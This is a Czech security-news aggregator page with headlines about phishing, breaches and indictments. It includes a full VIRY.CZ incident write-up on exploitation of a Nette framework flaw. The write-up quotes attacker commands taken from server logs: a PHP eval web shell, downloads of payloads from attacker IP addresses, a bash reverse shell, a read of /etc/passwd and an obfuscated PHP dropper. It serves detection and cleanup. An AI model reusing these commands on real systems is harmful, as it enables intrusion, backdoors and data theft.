Viry a Červi

How cybercriminals play the domain game

The Register - Anti-Virus - 2 hodiny 22 min zpět
And why AI tools will make you less vulnerable

Sponsored  Conventional email security tools are losing the battle against phishing attacks. The cause? Instead of registering a handful of domains from which to conduct their phishing campaigns, many cybercriminals now buy them by the thousand. This approach makes it harder for traditional email protection tools to spot phishing emails among the ‘noise’. Thanks to bulk domain registration services, malicious spammers can tip the balance in their favour through sheer volume.…

Kategorie: Viry a Červi

OpenStack haven OpenDev yanks Gerrit code review tool after admin account compromised for two weeks

The Register - Anti-Virus - 6 hodin 14 min zpět
Source warehouse asks users to verify recent project commits to ensure they’re not malicious

OpenDev.org, which hosts the official OpenStack source code, on Tuesday tore down its Gerrit deployment after realizing it had been secretly hacked two weeks ago.…

Kategorie: Viry a Červi

Top tip, everyone: Chinese hackers are hitting these 25 vulns, so make sure you patch them ASAP, says NSA

The Register - Anti-Virus - 8 hodin 42 min zpět
Plus this Chrome one being exploited in the wild, we note

The NSA has blown the lid off 25 computer security vulnerabilities Chinese government hackers are using to break into networks, steal data, and so on. The US super-spies said they went public with their list to help IT staff prioritize bug fixing. That is to say: if you're unsure of which patches to apply, do these first.…

Kategorie: Viry a Červi

Ransomware Group Makes Splashy $20K Donation to Charities

VirusList.com - 20 Říjen, 2020 - 22:36
Cybercriminal gang Darkside sent $20K in donations to charities in a ‘Robin Hood’ effort that’s likely intended to draw attention to future data dumps, according to experts.
Kategorie: Viry a Červi

VMware patches, among other things, ESXi flaw that can be abused by miscreants on the network to hijack hosts

The Register - Anti-Virus - 20 Říjen, 2020 - 22:14
Adobe issues out-of-band patches, too, for Photoshop, Illustrator, InDesign, After Effects, etc

Sysadmins responsible for VMware deployments should test and apply the latest security updates for the software.…

Kategorie: Viry a Červi

Adobe Fixes 16 Critical Code-Execution Bugs Across Portfolio

VirusList.com - 20 Říjen, 2020 - 20:31
The out-of-band patches follow a lighter-than-usual Patch Tuesday update earlier this month.
Kategorie: Viry a Červi

Russian “government hackers” charged with cybercrimes by the US

Sophos Naked Security - 20 Říjen, 2020 - 18:59
What can we learn from the US DOJ indictments against the "Sandworm Team"?

Facebook: A Top Launching Pad For Phishing Attacks

VirusList.com - 20 Říjen, 2020 - 18:54
Amazon, Apple, Netflix, Facebook and WhatsApp are top brands leveraged by cybercriminals in phishing and fraud attacks - including a recent strike on a half-million Facebook users.
Kategorie: Viry a Červi

Pharma Giant Pfizer Leaks Customer Prescription Info, Call Transcripts

VirusList.com - 20 Říjen, 2020 - 18:20
Hundreds of medical patients taking cancer drugs, Premarin, Lyrica and more are now vulnerable to phishing, malware and identity fraud.
Kategorie: Viry a Červi

Tisíce českých webů je nutné záplatovat!

VIRY.CZ - 20 Říjen, 2020 - 17:59

Titulek zní trošku bulvárně, ale plyne to z nástroje DNS crawler, který periodicky prochází domény druhé úrovně pod TLD .cz, sbírá data z DNS, webových a mailových serverů a umožňuje získaná data analyzovat. A právě z těchto dat plyne, že na více než 36 tisících doménách nějakým způsobem figuruje populární tuzemský framework Nette, umožňující provoz webových stránek či jiných webových aplikací. To je skvělá zpráva, pokud by se v tomto nástroji neobjevila první závažná zranitelnost po 13 letech…

Číslo 36 tisíc bylo uvedeno v článku na NIC.CZ i včetně důležitého závěru:

V současné chvíli se nám podařilo skrze data získaná DNS crawlerem identifikovat přes 36 tisíc českých domén, na kterých je dostupný web postaven na Nette frameworku. Bohužel však z těchto dat není možné zjistit konkrétní verzi frameworku. Je tedy velmi pravděpodobné, že ne všech 36 tisíc webů je zranitelností ohroženo a mnohé již byly aktualizovány na některou z opravených verzí. Nicméně z naší zkušenosti víme, že tyto webové technologie obvykle nebývají z různých důvodů pravidelně aktualizovány, někdy i mnoho let. V současnosti tak diskutujeme možnosti identifikace konkrétních webů, které jsou zmíněnou zranitelností ohroženy a možnosti oslovení jejich vlastníků.

Stručně řečeno, i já jsem záplatoval na třech různých webových serverech s křížkem po funuse s nelichotivým výsledkem: na všech už předtím došlo k zneužití této zranitelnosti! Takže pokud máte například firemní webové stránky na Nette frameworku, či nějakou jinou aplikaci, je potřeba to sakra rychle řešit (pokud se tak už nestalo), než z toho bude průšvih! Více v popisu chyby CVE-2020-15227.

Časovaná bomba?

Z detailnější analýzy mě vyplynulo, že si útočníci dělají patrně přípravu na budoucí útok tím, že si na webový server skrze zranitelnost dopraví soubory jako test2.php či test3.php s programovým kódem jako:

<?php @eval($_POST['passlincx']); ?>

Nemám jiné vysvětlení, než že to jsou “zadní vrátka” k serveru do budoucna! Příkaz eval totiž spustí na serveru vše, oč ho útočník vzdáleně požádá a není náhodou, že se mu občas říká evil Útočník tak může získat hesla, konfigurace, nastavení, vykrást citlivé informace a nebo prostě na web hodit hlášku HACKED. A to kdykoliv v budoucnu! Opět připomínám, že toto jsem viděl na VŠECH kompromitovaných strojích, které jsem řešil. Za sebe tak nemůžu hovořit o náhodě.

Ještě více technicky aneb co jsem použil v praxi a jak jsem k tomu dospěl

Způsob realice útoku nebudu popisovat, ale je velice jednoduchý a docvakne každému správci serveru, jakmile se bude přesvědčovat, zda k němu již došlo či ne. Následuje postup, který jsem použil já a mohl by se někomu hodit. Je jasné, že by to šlo “vytunit” lépe a sfouknout to celé jedním vrzem, ale já to prostě dělal takhle i s ohledem na menší množství záznamů potvrzujících kompromitaci serverů.

Tenhle příkaz (Linux) projde starší (zkomprimované) logy Apache a pokud něco vypíše, znamená to, že zneužití chyby se nevyhnul ani daný server (místo .gz le použít i .log pro aktuální protokol):

find /var/log/apache2/ -name \*.gz -print0 | xargs -0 zgrep "nette.micro" | grep shell_exec

Pokud tenhle výstup vemete a zkopírujete například do služby regex101.com, můžete si pomocí reg. výrazu:

cmd=(.*) HTTP

“vysvítit” problematickou část kódu, tedy shell kód, který se útočník na serveru snažil spustit (resp. skoro zcela určitě spustil, pokud nebylo Nette včas záplatováno). V sekci “match information” lze výstup uložit například do CSV a tam dále vytřídit. Pak třeba použít textfixer.com na odstranění duplicit a dojít až k soupisu toho, co si všechno útočník na serveru pouštěl. V mém případě proběhlo všechno toto (co řádek, to útok):

echo%20%22%3C?php%20@eval(%5C$_POST%5B%27passlincx%27%5D)%20?%3E%22%20%3E%20test2.php echo+%22%3C%3Fphp+%40eval%28%5C%24_POST%5B%27passlincx%27%5D%29+%3F%3E%22+%3E+test2.php echo%20%22qwertasdfgzxcvb%22 echo+%22qwertasdfgzxcvb%22 echo%20GK5OxJaE echo%20FRrNjp8Q echo%20lYgCsO0m echo%20Qb49jcKJ echo%20VQajnghR cat%20/etc/passwd certutil%20-urlcache%20-split%20-f%20http://120.92.109.248/sa.exe sa.exe echo%20%27myhhdd%27 id echo%20%22myhhokk%3C?php%20@eval(%5C$_POST%5B%27passlincx%27%5D)%20?%3E%22%20%3E%20test3.php%20%7C%7Cls echo%20%22myhhokk%3C?php%20@eval(%5C$_POST%5B%27passlincx%27%5D)%20?%3E%22%20%3E%20test.php%00 wget%20http:/91.121.183.89:58080/mylinok2/badmin.jpg%20-O%20webconfig.txt.php%00 bash%20-i%20%3E&%20/dev/tcp/%27+lhost+%27/%27+lport+%270%3E&1 bash+-i+%3E&%2Fdev%2Ftcp%2F%27_lhost_%27%2F%27_lport_%270%3E=&1= wget%20http://91.121.183.89:58080/mylinok2//badmin.jpg%20-O%20webconfig.txt.php wget+http%3A%2F%2F91.121.183.89%3A58080%2Fmylinok2%2F%2Fbadmin.jpg+-O+webconfig.txt.php echo%20%22myhhokk%3C?php%20file_put_contents(%5C$_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27//config.bak.php%27,base64_decode(%27PD9waHANCmZ1bmN0aW9uIGJ5cGFzcygpew0KCSR4ID0gIlwkX1BPIjsNCiAgICByZXR1cm4gImwoIi4keC4iU1RbJyI7DQp9DQpldmFsKCJldmEiLmJ5cGFzcygpLiJ4J10pOyIpOw==%27));?%3E%22%20%3E%20test3.php echo+%22myhhokk%3C%3Fphp+file_put_contents%28%5C%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2F%2Fconfig.bak.php%27%2Cbase64_decode%28%27PD9waHANCmZ1bmN0aW9uIGJ5cGFzcygpew0KCSR4ID0gIlwkX1BPIjsNCiAgICByZXR1cm4gImwoIi4keC4iU1RbJyI7DQp9DQpldmFsKCJldmEiLmJ5cGFzcygpLiJ4J10pOyIpOw%3D%3D%27%29%29%3B%3F%3E%22+%3E+test3.php wget%20http://91.121.183.89:58080/mylinok2//uladmin.jpg%20-O%20webconfigul.txt.php wget+http%3A%2F%2F91.121.183.89%3A58080%2Fmylinok2%2F%2Fuladmin.jpg+-O+webconfigul.txt.php wget%20http://91.121.183.89:58080/mylinok2//uladmin.jpg%20-O%20webconfigul.txt.php%7C%7Cid wget+http%3A%2F%2F91.121.183.89%3A58080%2Fmylinok2%2F%2Fuladmin.jpg+-O+webconfigul.txt.php%7C%7Cid echo%20%22myhhokk%3C?php%20@eval(%5C$_POST%5B%27passlincx%27%5D)%20?%3E%22%20%3E%20test2.php echo%20%22myhhokk%3C?php%20@eval(%5C$_POST%5B%27passlincx%27%5D)%20?%3E%22%20%3E%20test2.php%00 echo+%22myhhokk%3C%3Fphp+%40eval%28%5C%24_POST%5B%27passlincx%27%5D%29+%3F%3E%22+%3E+test2.php ifconfig

V kostce se pokoušeli útočníci o toto:

  • Spuštění ifconfig – útočník se dozví rozpoložení síťových adapterů serveru.
  • Eval() na x způsobů jsem již rozebíral – backdoor do budoucna – umožní útočníkovi “nevyléčený” server kdykoliv ovládnout.
  • Pokus stažení a spuštění backdooru v souboru s příponou EXE (wget a sa.exe)! Tohle nemohlo vyjít, neboť šlo o Linux / Debian. Na Windows by to ale představovalo sakra problém!
  • Nasazení silně obfuskovaného PHP kódu, maskovaného v JPG souboru! Účel zatím neznám, možná podobný význam jako eval() záležitost.
  • Získání obsahu souboru /etc/passwd, tedy seznamu uživatelů. Tohle může / nemusí bolet. Záleží na užití serveru.
Co dělat, když už na serveru útočníci byli?

Na to těžko odpovědět. Záleží, k čemu server sloužil a zda jste schopni dosledovat dění především těch eval() záležitostí. To jestli byl eval() spuštěn (skrze soubory typu test2.php, test3.php v mém případě), dohledáte například v log souboru Apache, nicméně CO ten eval spustil, to už hůře. V mém případě naštěstí nebyl nikdy HTTP POST volán, pouze byla skrze HTTP GET ověřena existence zadních vrátek. Stačilo tak podobné soubory zlikvidovat. Jistotou je pochopitelně kompletní reinstalace serveru, opětovné vybuildování projektů, …

The post Tisíce českých webů je nutné záplatovat! appeared first on VIRY.CZ.

Kategorie: Viry a Červi

Remember insider threat? Old news now. Focus on malware detection, says EU infosec agency

The Register - Anti-Virus - 20 Říjen, 2020 - 17:25
ENISA annual report also calls for better use of threat intel by frontline bods

Insider threats, ransomware and cyber espionage were all in decline in the early part of 2020, according to the EU’s cybersecurity agency – though the risk of an “uncontrolled cyber arms race” among nation states is growing.…

Kategorie: Viry a Červi

Office 365 OAuth Attack Targets Coinbase Users

VirusList.com - 20 Říjen, 2020 - 16:33
Attackers are targeting Microsoft Office 365 users with a Coinbase-themed attack, aiming to take control of their inboxes via OAuth.
Kategorie: Viry a Červi

Mobile Browser Bugs Open Safari, Opera Users to Malware

VirusList.com - 20 Říjen, 2020 - 15:00
A set of address-spoofing bugs affect users of six different types of mobile browsers, with some remaining unpatched.
Kategorie: Viry a Červi

Confronting Data Risk in the New World of Work

VirusList.com - 20 Říjen, 2020 - 15:00
With Stanford research showing that nearly half of the U.S. labor force is now working from home full-time, insider threats are a much more difficult problem.
Kategorie: Viry a Červi

Google’s Waze Can Allow Hackers to Identify and Track Users

VirusList.com - 20 Říjen, 2020 - 12:48
The company already patched an API flaw that allowed a security researcher to use the app to find the real identity of drivers using it.
Kategorie: Viry a Červi

You’ve open sourced your relational database manager with PostgreSQL – but how can you keep it secure?

The Register - Anti-Virus - 20 Říjen, 2020 - 08:00
We'll help you manage risk while chasing your RDBMS dreams

Webcast  There was a time when open source was still – no matter how many decades it had driven software projects – regarded as the playground of hippies and utopians. Bold and brave, yet thrown together, inconsistent and unsecured when compared to more established products.…

Kategorie: Viry a Červi

Notpetya, Olympics hacking, Novichok probe meddling... America throws the book at six alleged Kremlin hackers

The Register - Anti-Virus - 19 Říjen, 2020 - 22:47
While the UK says Russia probed 2020 Games systems, too

Six men have been named as Russian military hackers and accused of spreading malware, disrupting the Olympics in retaliation for Russia's doping ban, and meddling with elections as well as probes into Novichok poisonings.…

Kategorie: Viry a Červi

Rapper Scams $1.2M in COVID-19 Relief, Gloats with ‘EDD’ Video

VirusList.com - 19 Říjen, 2020 - 21:22
"Nuke Bizzle" faces 22 years in prison after brazenly bragging about an identity-theft campaign in his music video, "EDD."
Kategorie: Viry a Červi

DOJ Charges 6 Sandworm APT Members in NotPetya Cyberattacks

VirusList.com - 19 Říjen, 2020 - 21:10
DOJ charges six Russian nationals for their alleged part in the NotPetya, Ukraine power grid and Olympics cyberattacks.
Kategorie: Viry a Červi

GravityRAT Comes Back to Earth with Android, macOS Spyware

VirusList.com - 19 Říjen, 2020 - 19:34
The espionage tool masquerades as legitimate applications and robs victims blind of their data.
Kategorie: Viry a Červi
Syndikovat obsah